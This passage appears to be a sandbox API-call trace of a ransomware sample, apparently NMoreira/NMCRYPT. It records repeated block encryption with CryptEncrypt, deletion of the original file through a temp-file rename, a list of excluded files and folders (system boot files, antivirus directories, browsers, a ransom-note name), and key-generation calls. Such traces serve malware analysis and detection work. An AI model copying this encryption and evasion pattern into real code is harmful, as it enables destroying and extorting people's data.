pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.591] GetLastError () returned 0x0 [0167.591] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.591] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.591] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.591] GetLastError () returned 0x0 [0167.591] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.591] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.591] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.591] GetLastError () returned 0x0 [0167.591] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.591] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.591] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.591] GetLastError () returned 0x0 [0167.592] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.592] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.592] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.592] GetLastError () returned 0x0 [0167.592] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.592] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.592] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.592] GetLastError () returned 0x0 [0167.592] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.592] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.592] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.592] GetLastError () returned 0x0 [0167.592] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.592] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.592] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.592] GetLastError () returned 0x0 [0167.592] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.592] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.592] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.592] GetLastError () returned 0x0 [0167.592] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.592] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.592] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.592] GetLastError () returned 0x0 [0167.592] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.593] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.593] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.593] GetLastError () returned 0x0 [0167.593] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.593] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.593] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.593] GetLastError () returned 0x0 [0167.593] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.593] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.593] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.593] GetLastError () returned 0x0 [0167.593] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.594] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb") returned 1 [0167.594] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado27.tlb")) returned 0 [0167.594] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb" [0167.594] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado") returned 1 [0167.594] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX237.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx237.tmp")) returned 0x237 [0167.595] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado27.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX237.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx237.tmp"), dwFlags=0x1) returned 0 [0167.595] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX237.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx237.tmp")) returned 1 [0167.596] CryptDestroyKey (hKey=0x9ad678) returned 1 [0167.596] wcslen (_String="OK") returned 0x2 [0167.596] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0167.596] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0167.596] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0167.596] CryptDestroyHash (hHash=0x9ad338) returned 1 [0167.596] CryptReleaseContext (hProv=0x8e3000, dwFlags=0x0) returned 1 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*NMCRYPT") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*Recovers your files.html") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*.exe") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*.dll") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*.lnk") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*.bat") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*.ini") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*.msi") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*.scf") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*pagefile.sys*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*NTUSER.DAT*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*AppData*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*\\winrar\\*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*\\Internet Explorer\\*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*\\java\\*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*\\TeamViewer\\*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*\\windows\\*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*\\ESET\\*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*\\AVG\\*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*\\AVIRA\\*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*\\AVAST Software\\*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*Atheros*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*Realtek*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*bootmgr*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*boot*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*boot*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*CONFIG.SYS*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*IO.SYS*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*MSDOS.SYS*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*NTDETECT.COM*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*ntldr*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*chrome*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*opera*") returned 0 [0167.596] PathMatchSpecW (pszFile="msado28.tlb", pszSpec="*firefox*") returned 0 [0167.596] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb", pszSpec="*") returned 1 [0167.596] strlen (_Str="NMoreira") returned 0x8 [0167.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.598] CryptGenRandom (in: 